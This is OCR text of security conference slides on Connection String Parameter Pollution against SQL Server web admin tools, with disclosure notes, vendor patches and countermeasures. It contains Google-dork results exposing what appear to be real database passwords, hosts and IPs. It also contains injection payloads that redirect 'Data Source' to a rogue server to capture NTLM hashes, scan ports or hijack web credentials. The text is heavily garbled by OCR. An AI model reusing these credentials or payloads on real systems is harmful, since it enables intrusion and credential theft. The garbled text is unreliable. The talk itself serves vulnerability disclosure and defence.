Connection Strings 



• Define the way an application connects to 
data repository 

• There are connection strings for: 

— Relational Databases (MSSQL, Oracle, MySQL,...) 

— LDAP Directories 

— Files 

— Etc... 
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Databases Connection Strings 

Data Source = myServerAddress; 
Initial Catalog = myDataBase; 
User Id = myUsername; 
Password = myPassword; 

Informatica 64 

www.itiformatica64.com 



Google Hacking 



Go ogle 



ifititle: "Login" Datasource inurlilogin.aspx 



Buscar 



Busqu&da avanzada 
PrEfErEncias 



o Buscar en la Web Buscar solo paginas en espanol 



La Web 

codeproject: problem in login. Free source code and programming help - r Traducir esta pagina l 

datasource = timelist: gridviewl.databindQ; As your making the list by hand, you can apply 
what ever maths you want to apply in the relevent areas of the ... 
www.codeproject.com/.../problem-in-login.aspx - En cache - Similares - 



Rugs Direct - Professional Partnership Login - r Traducir esta pagina l 

String, Application Name=rugsdirectory-RD;data source=C 1 W-SQL002;persist security 
info=True;lnitial Catalog=RugsDirect Prototype;lntegrated Security=SSPI; ... 
www.kimdesigiisexclusives.com/rugsdirector\ f /... /login. aspx - Similares - 

Life Navigator - Login - [ Traducir esta pagina ] 

ConnectionString: Data 5ource=p3swhsql-v19. shr.phx3.secureserver.net: Initial 
Catalog=dbalmer; User ID=dbalmer: Password=W0rri3sTing: 
lifenavigator.dbalmer.net/Login.aspx - En cache - Similares - 



Forms Authentication only displays login.aspx - r Traducir esta pagina l 

sqlConnectionString="data source 7.0.0.1;Trusted_Connection=yes" ... Data Source=" + 
Constants. DATASource; sLoginQuery = "SELECT tbIUser.* " + ... 
www.dotnetmonster.com/.. ./Forms-Authentication-only-displays-login-aspx - 

En cache - Similares - <=5 [J] [x] 
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Google Hacking 



Baxter Research Client Login - r Traducir esta pagina l 

The remaining data source is a case summary printout. If a case has been placed on the 
imaging computer it is no longer available as a case summary printout ... 
www.baxterresearch.net/login.asp - En cache - Similares - >>[5® 

Login. Micro Strategy Web. 

DATA SOURCE. I NTE LSTRATE G Y-2 . Hide help - NEED HELP? Why do I need to log in? What 
is a cookie and how are cookies used at this Web site? ... 
https://www.carloshaya.net/.. ./login. asp?.. .autologin... - En cache - Similares - 



HoutS Family Login - [ Traducir esta pagina 1 

Const Connect DB_frogst a r = "Provider=IBMDM00;Password=WEBACC01;User ID= 
WEBUSRHNS;Data Sou ree=1 0.42.42. 35 ;Tran sport Product=Client Accesses 3 L= DEFAULT' 
Const ... 

www.houtsfamily.org/secadmin/login.asp - En cache - Similares - 



Alberta Data Search - Customer Login - r Traducir esta pagina l 

Now that our website is up and running, we are taking the next step in becoming Alberta's best 
real estate data source. Feedback from our customers has ... 
albertadatasearch.com/login.asp - En cache - Similares - 
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UDL (Universal 



Google 



filetype UDL password Buscar 



BusquEda avanzada 
PrefE-rE-ncias 



Buscar en: o la Web paginas en espanol paginas de Argentina 



La Web Resultados 1 - 10 de aprco 

Sugerencia: Buscar solo resultados en espanol . Puede especificar el idioma de busqueda en Preferencias . 

[oledbl ; Everything after this line is an OLE DB initstrinq ... - r Traducir esta pagina l 

[oledb] : Everything after this line is an OLE DB i nit string Provider=SQLOLEDB.1 
:Password=eFpROG777;Persist Security lnfo=True;User ID=sa;lnitial ... 

www.stm-group.com/DocsFiles/2/1.udl - En cache - Similares -'ffitSB 

[oledbl ; Everything after this line is an OLE DB initstrinq ... 

Formato de archivo Desconocido - Version en HTML 

Provider=SQLOLEDB.1;Password=FcH56az;Persist Security lnfo=True:User ID=qai505;lnitial 
Catalog=qai505;Data Source=lwdb093. servidoresdns.net. 

www.infoser.es/bd.udl - Similares - -j^ffiS 

[oledbl ; Everything after this line is an OLE DB initstrinq ... 

Formato de archivo: Desconocido - Version en HTML 

Provider=SQLOLEDB. 1 ; P asswo rd = - ! ! A )ZAQ ! 3 e cjf] d s a n n k; P e rs i st Security lnfo=True;User 
ID=xjsoptstgdb_apuser;lnitial Catalog=OPTDB;Data ... 

jsfuqt.jihsunfutures.com. tw/Quote/MTK/JSOPTSTG.udl - Similares - 

[oledbl ; Everything after this line is an OLE DB initstrinq ... 

Formato de archivo Desconocido - Version en HTfvIL 

Provider=SQLOLEDB.1;Password=lilica1982;Persist Security lnfo=True;User ID=ivpmed:lnitial 
Catalog=1vpmed;Data Source=200.234. 197.30. 

sub/ersion.assembla.com/svn/^p_medical/trunki l ".../conexao.udl - Similares - =5 [J] [x | 



... Everything after this line is an OLE DB init string Provider=MSDASQL.1;Password="":Persist 
Security lnfo=True:User ID=admin;Extended Properties="DSN=Ba3a ... 

194.1 87.1 05. 38/dat/_buffer/yumax.^l/Base/.../logisticsBase.udl - Similares 
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Links) Files 



Propiedades de vinculo de datos 




Proveedor 



Conexion 



Avanzadas Todas 



Especifique lo siguiente para conectarse a datos de SQL Server: 
1. Seleccione escriba un nombre de servidor: 



vvdb D93.servidoresdns .net 



Actualizar 



2. Escriba la informacion para iniciarsesion en el servidor: 
Usar la seguridad integrada de Windows NT 
o Usar un nombre de usuario y una contrasena espec ificos: 



Nombre de usuario: qai5D5 
Contrasena: ••••• 



[nl Contrasena en bianco V Permitir guardar contrasena 
3. @ Seleccione la base de datos del servidor: 

qai505 ▼ 
Adjuntar archivo de base de datos como nombre: 



qai5C«5 



Usar el nombre del archivo: 



g 



Probar conexion 



Aceptar 



Cancelar 



/fyuda 



Credentials 



Operating System Accounts 

Data Source = 

myServer Ad dress; 

Initial Catalog = myDataBase; 

User Id = myUsername; 

Password = myPassword; 

Integrated Security = 
SSPI/True/Yes; 



Database Credentials 

Data Source = 

myServerAddress; 

Initial Catalog = myDataBase; 

User Id = myUsername; 

Password = myPassword; 

Integrated Security = No; 
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Users autheticated by Web App 



Web application manages the login process 




1.- Web applicaton 
connects using its 
credentials to the 
database. 




2.- Asks user login 
information 



3.- Checks login 
information about info 



stored in custom users 



table. 




Database Engine 
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App running on Web Server 



Users autheticated by Database 



Database engine manages the login process 




Database Engine App running on Web Server 
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Connection String Attacks 



• It's possible to inject parameters into connection 
strings using semi colons as separators 

Data Source = myServerAd dress; 

Initial Catalog = myDataBase; 

Integrated Security = NO; 

User Id = myilsername; 

Password = myPassword; Encryption = Off; 
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ConnectionStringBuiler 

• Available in .NET Framework 2.0 

• Build secure connection strings using parameters 

• It's not possible to inject into the connection string 



The following example demonstrates how the SqlConnectionStringBuilder handles an inserted extra value for the Initial Catalog setting. 


Visual Basic 




Dim builder As Hew System . Data . SqlClient . SqlConnectionStringBuilder 
builder ( "Data Source") = "(local)" 
builder (" Integrated Security") = True 

bui lder ( " Initial Catalog " ) = " Adventure works ; HewValue=Bad " 
Console . wr i teLine ( bui lder . Connect ionSt ring ) 












System . Data . SqlClient . SqlConnectionStringBuilder builder = 

new System . Data . SqlCl ient . SqlConnect ionStr ingBui lder ( ) ; 
bui lder [ "Data Source"] = "(local)"; 
builder [" integrated Security"] = true; 

builder [" Initial Catalog"] = " Ad venture works; Hew Value = Bad" ; 
Console . wr i teLine ( bui lder . Connect ionSt ring ) ; 
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Are people aware of this? 



Gougle 


"Connection String Attack" inurlOWASP 






Buscar 


BiisquEda avanzaca 
PrEfErEndas 


Buscar en: o la Web 


paginas en espanol 


paginas de Argentina 



La Web 



Su busqueda - "Connection String Attack" inurl:OWASP - no produjo ningun documents 
Sugerencias: 

• Asegurese de que todas las palabras esten escritas correctamente. 

• Intente usar otras palabras. 

• Intente usar palabras mas generales. 

• Intente usar menos palabras. 



Go ogle 



"Connection String Injection" inurl:OWASP 



Buscar 



B Lisa u Ed a avanzada 
PrEfErEndas 



Buscar en: ® la Web paginas en espanol paginas de Esparia 



La Web 



Su busqueda - "Connection String Injection" inurl:OWASP - no produjo ningun docurnento. 
Sugerencias: 

Asegurese de que todas las palabras esten escritas correctamente. 
Intente usar otras palabras. 
Intente usar palabras mas generales. 
Intente usar menos palabras. 



Inform 

www.infoi 



Connection String Parameter Pollution 



• The goal is to inject parameters in the connection 
string, whether they exist or not 

• Had duplicated a parameter, the last value wins 

• This behavior allows attackers to re-write 
completly the connection string, therefore to 
manipulate the way the appliation will work and 
how should be the it authenticated 
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Pollutionable Behavior 





DBConnection Object 

















Param, 
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What can be done with CSPP? 

Rewrite a parameter 
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Scannin 




Development 



Database 1 



Finnacial 



J L 



Internet 
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g the DMZ 





Test 



Database 



Forgotten 
Database 



Web app 
vulnerable 
to CSPP 





Data 
Source 




J 



Production 



Database 



Port Scanning a Server 
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What can be done with CSPP? 

Add a parameter 
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CSPP Attack 1: Hash stealing 



1. - Run a Rogue Server on an accessibl IP address: 
Rogue_Server 

2. - Activate a sniffer to catch the login process 
Cain/Wireshark 

3. - Duplicate Data Source parameter 
Data_Source=Rogue_Server 

4. - Force Windows Integrated Authentication 
Integrated Security=true 
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CSPP Attack 1: Robo de Hash 



Data source = SQL2005; initial catalog = dbl; 
Integrated Security=no; user id=+'User_ Value'+; 
Password=+'Password_ Value'+; 

Data source = SQL2005; initial catalog = dbl; 

Integrated Security=no; user id= ;Data 
Source=Rogue_Server; 

Password=;lntegrated Security=True; 
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CSSP 1:ASP.NET Enterprise Manager 




Connect to Server 





Server Address: localhost 
Username: 



Password: 



; data source = 80.3 




; integrated security= true 



Connect 



Sniffer $ Cracker Traceroute M CCDU lt ff 


Wireless 


§►) Query 




Timestamp | 


TDS server | 


Client 


Username | 


Password 


Ai 


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■a 


TTTTTTTTTTTTTTTTTTI 

30.81 




217.130. 








N' 


22/07/2009- 13:53:09 


SO.Sll^^V 


217.13Q.^^V 


VE103| 




N' 














AuthType | 


Domain | 


LM Hash 


Domain | 


LM Has 


NTLM Session 5... 


GRUPO 


| TRABAJO 


5A932C2E1 1D567440000000000| 


GRUPO 


TRABAJO 


TTTTTTTTTTTTTTTTTTI 

5A932( 


NTLM Session 5... 


GRUPOJRABAJO 


7447CA85CE589C320000000000 


GRUPOJRABAJO 


7447C/ 
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CSPP Attack 2: Port Scanning 



1. - Duplicate the Data Source parameter setting 
on it the Target server and target port to be 
scanned. 

Data_Source=Target_Server, target_ Port 

2. - Check the error messages: 

- No TCP Connection -> Port is opened 

- No SQL Server -> Port is closed 

- SQL Server -> Invalid Password 
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CSPP Attack 2: Port Scanning 



Data source = SQL2005; initial catalog = dbl; 
Integrated Security=no; user id=+'User_ Value'+; 
Password=+'Password_ Value'+; 

Data source = SQL2005; initial catalog = dbl; 

Integrated Security=no; user id= ;Data 
Source= Target_Server, Target_ Port; 

Password=;lntegrated Security=True; 

Informatica 64 

www.itiformatica64.com 



CSPP 2: myLittleAdmin 



Port is Opened 



El 



myLittleAdmin 

for SQL Server 



I 



mylittJeAdmin Error Dialog Box 



.Net SqlClient Data Provider 

A connection was successfully established with the server r but then an error occurred during the login 
process, (provider: TCP Provider r error: - An existing connection was forcibly closed by the remote 
host.) 



Close 
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version 3.5 



localhost 



master 



SQL Server Authentication ▼ 
3 source = www. google. com r 80 



[ Connect Options >> 



CSPP 2: my Little Admin 



Port is Closed 




myLitt leAdrnin 

for SQL Server 



Q myLrttSeAdmin Error Dialog Box 



.Net SqlClient Data Provider 

A network-related or instance -specific error occurred while establishing a connection to SQL Server. The 
server was not found or was not accessible. Verify that the instance name is correct and that SQL Server 
is configured to allow remote connections, ^provider: TCP Provider r error: - A connection attempt failed 
because the connected party did not properly respond after a period of time, or established connection 
failed because connected host has failed to respond.) 



Close 




version 3.5 











localhost 




master 


SQL Server Authentication ▼ 


source =www . google . com r 14Z0 







Connect ] Options >> 
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CSPP Attack 3: Hijacking Web Credentials 



1. - Duplicate Data Source parameter to the 
target SQL Server 

Data_Source=Target_Server 

2. - Force Windows Authentication 
Integrated Security=true 

3. - Application pool in which the web app is 
running on will send its credentials in order to 
log in to the database engine. 
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CSPP Attack 3: Hijacking Web Credentials 



Data source = SQL2005; initial catalog = dbl; 
Integrated Security=no; user id=+'User_ Value'+; 
Password=+'Password_ Value'+; 

Data source = SQL2005; initial catalog = dbl; 

Integrated Security=no; user id= ;Data 
Source= Target_Server; 

Password=;lntegrated Security=true; 
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CSPP Attack 3: Web Data Administrator 



WEB Data Ad mini 




Server a 



DATABASES 




dministrator 




Name 


■ 




| master 






| rnsdb 






J ReportServer 






1 ReportServerTernpDB 






1 ternpdb 





Name 


Tvpe 


Server Access 


i 


NT AUTHORrTYY^BR'VORK SERVICE 


NTUser 


Grant 




ifi sa 


Standard 


NonNTLogin 




BUILTlN^Jsers 


NTGroup 


Grant 
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CSPP Attack 3: 
myLittleAdmin/myLittleBackup 



■" 


J my Little Admin 


















License 


Connection ^| 






Connection 








Connection string: Data Source =^^^^5 Network Library =; Connection Timeout= 30; Packet 

Size =4096; Integrated Security =no; User ID=; data source = localhost; integrated 

security =true; Encry pt=no; Initial Catalog =master; 

Connection timeout 30 

Database: master 

Data source: localhost 

Network packet size: 4096 

Server version: 09.00. 3054 

Work station khMSSQLWEB 
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CSPP Attack 3: ASP.NET Enterprise Manager 





nect to Server 





Server Address: localhost 



Username: 



Password: 
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test; data source = localhi 
; integrated security=true 



Connect 



$f ASP. Net Enterprise Manager 



A 



L^J Recommend This Site 



Databases 



yj master 

\§ msdb 

|p tempdb 
Security 
Logins 

^ Server Roles 
Pi Management 
@^ Process Info 




ASP.Net 




rrr 



ASP Enterprise Manager Website 



Other Databases 



• MySQL 

— Does not support Integrated security 

— It's possible to manipulate the behavior of the web application, 
although 

• Port Scanning 

• Connect to internal/testing/for developing Databases 

• Oracle supports integrated authority running on Windows 
and UNIX/Linux servers 

— It's possible to perform all described attacks 

• Hash stealing 

• Port Scanning 

• Hijacking Web credentials 

— Also it's possible to elevate a connection to sysdba in order to 
shutdown/startup an instance 
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myLittleAdmin/myLittleBackup 



Securit 



late for mvLittle Admin and mvLittleBacku 




'revious Topic 



opic 



elian 



rnvLittleToolS 

Rank: Administration 
Groups: Administration 

Joined: 11/09/2006 
Posts: 458 
Points: 320 
Location: Enghien Les 
Bains, France 



Back to top 



Posted: jueves, 03 de septiembre de 2009 10:47:57 

myLittleTools announces a security update for myLittleAdmin and myLittleBackup 

Paris, France - September 3, 2009 -- A security update has been issued for myLittleAdmin and 
myLittleBackup that fixes one security vulnerability. All users should install this update as soon as 
possible. 

Users can download this update by selecting Help/Check for Update in the applications' sidebar. 



Al 

1 1 1 

SC 

C( 

m 

4/ 

9E 

T 

W 

E 

T 



Some of our customers 



First Server (Japan) r GoDaddy (USA) s XO Communication s 
(USA) , MD Web Hosting (Australia) , Capital One Bank 
(USA) , Volvo IT (Sweden) , NetVision (Israel) , Orange 
(France) , WebECS (USA) , British Nuclear Group (UK) , 
Lunarpages (USA) , Digiweb (New Zealand) f Disco untASP 
(USA) s Live Nation (UK) T LinkByNet (France) , Telenor 
Networks (Norway) , US Army (USA) r Namesco (UK) , ... 



j-bdted 

:leAdmin for MS 
around the world. 



iAdmin.com and 



http : //www. m y Littl eBa cku p. com 



The names of actual companies and products mentioned herein may be the trademarks of their 
respective owners. 

myLittleTcols 

Web-Eased Tools For SQL Server 
Professionals and Hosting Companies 




myLittleTools released a secury advisory and a patch about this 
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ASP.NET Enterprise Manager 



ASP.NET Enterprise Manager is "abandoned", but it's 
been used in a lot of web Control Panels. 



ASPEnterpriseManager.vb - Bloc de notas 



Archive Edition Forrinato Ver Ayuda 



■fr -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to -to frfrfrfrfrfr CONNECTION STRING 

Public class connect! onstri ng 

Private _Datasource as string 
Private _lniti alcatal og as string 
Private _UID as String 
Private _pwd as string 
Private _constr as string 

Public Property Datasource As string 

Get 

Return(_Datasource) 
End get 
set 

_Datasource = value 

_constr = "Data source=" & _Datasource & "; initial catalog 
_lniti alcatal og & ";uid=" & _UID & ";pwd=" & _PWD 

End set 
End Property 



= " & 



Fix the code yourself 
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ASP.NET Enterprise Manager 

ASP.NET Enterprise Manager is "abandoned", but it's 
been used in a lot of web Control Panels. 



| A£PEntManager[l],txt - Bloc de notas 




• 



Archive Edition Form ato Ver Ayuda 



Public Property Datasource As string 
Get 

Return (_Datasource) 
End get 
set 

_Datasource = value 
Bui 1 dconnecti onstri ng() 
End set 
End Property 



Pri vate sub Bui 1 dconnecti onstri ng() 

Dim builder as New sqlconnecti onstri ngBui 1 der 

bui 1 der . Add("Data source", _Datasource) 

bui 1 der . Add( "miti al catal og" , _miti alcatal og) 

builder .AddC'uid" , _uid) 

bui 1 der . Add("pwd" , _pwd) 

_constr = bui 1 der . connecti onstri ng 

End sub 



• Fix the code yourself 
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ASP.NET Web Data Admistrator 



r 

\$ SQL Web Data Administrator - Home - Windows Internet Explorer 

~ o 




http :/ /www, c o d ep I ex, c o m/Sq I Web Ad m i n 




SQL Web Data Administrator - Heme 



T T SSQ T Pagina ^ Herramientas ^ 



» 



r I 




S,parch ail CadePlpx Draipcts 



RE: Connection String Injection Attacks [9366jh] 

Microsoft Security Response Center [Microsoft Security Response Center] 



Hi Chema, 

thank you very much for your thoughtful input on this matter. As you 
may already have noticed, the corresponding entry on download center 
is no longer available now as a result of your report. We will archive 
the issue on our end. Please let me know if you have any further 
questions or comments. 

Thanks T 







Whether you are doing Microsoft Windows or Web development, or just need remote access to data for 




















yourself or your clients, the Web Data Administrator is the perfect complement to your toolbox. 


Activity 










Dona VioiAfc 


















Listo ^ Internet | Modo protegido: activado 






L 









ASP Web Data Administrator is secure in CodePlex web site, but not in 
Microsoft web site where is been published an unsecure old version 
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Countermeasures 



• Harden your firewall 

- Outbound connections 

• Harden your internal accounts 

- Web application 

- Web server 

- Database Engine 

• Use ConnectionStringBuilder 

• Filter the j) 
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Questions? 



Contacto 

Chema Alonso 

chema@informatica64.com 

http://www.informatica64.com 

http://elladodelmal.blogspot.com 

Palako 

palakko@lateatral.com 
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